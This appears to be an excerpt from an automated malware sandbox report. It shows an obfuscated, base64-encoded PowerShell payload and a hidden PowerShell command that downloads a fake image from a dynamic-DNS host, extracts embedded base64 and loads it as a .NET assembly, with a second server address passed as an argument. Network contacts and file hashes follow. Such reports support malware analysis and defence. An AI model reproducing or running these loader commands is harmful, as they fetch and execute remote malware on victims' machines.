꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷BP⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷aQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷ZwBl⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷TwBm⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Zg⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷w⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷r⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷dQBi⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷By⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷Ew⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷WwBT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷ZQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷XQ⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷RgBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBC⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBk⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bb⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷eQBz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷ZQBt⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bg⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQBd⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷OgBM⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷EI⤏ ꒼ ⛲ ⫰ 〷eQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BB⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YgBs⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BU⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷JwBk⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷E8⤏ ꒼ ⛲ ⫰ 〷LgBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBl⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷7⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bt⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BN⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷VgBB⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷bwBr⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷L⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷bwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷WwBd⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBO⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷Sg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷D⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷x⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷1⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷OQ⤏ ꒼ ⛲ ⫰ 〷4⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷5⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷NQ⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷Lw⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷H⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷QQBz⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷dgBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷H0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤏ ꒼ ⛲ ⫰ 〷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NNJ/001/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
Network
| Country | Destination | Domain | Proto |
| TR | 45.90.89.50:80 | 45.90.89.50 | tcp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\ajptgllb.cmdline
| MD5 | 407787d04743923d098a6e72ec8ba8e7 |
| SHA1 | c4afdcf8ba730ff51f44df3e5e2824be7177ce48 |
| SHA256 | 28f628af3531020bbb767d0c51ec63ae76339a64a74c92f80a28fdf15ba2fa13 |
| SHA512 | 1c84f42e52159a6b56ea2084eb0e043d2cd70ec9d72f2a785f7ec9680dfd06471acbf0bcd352cda8dde021500b80d039e17fa66d0275f0be204aa742f3118459 |
\??\c:\Users\Admin\AppData\Local\Temp\ajptgllb.0.cs
| MD5 | c8323e21fb3e0a43c3296686b3399df5 |
| SHA1 | 6acf09f8b65000472a3011fa65600dbe223ce44e |
| SHA256 | 82cde5c0e8c3ebd12df77f91b0c4fb50c5b9448078a890907be15146d58a4922 |
| SHA512 | 6c25e0c9ba56534963d10969fe65a7dd74c2e5f3f848c197e6b71699b71086f6920124e83a23e3f43894330c7a1feef2d7b39fe576eaf465e7ee78277083dd91 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCDA19.tmp
| MD5 | 00a7f391047e691666f4653afcf42b0a |
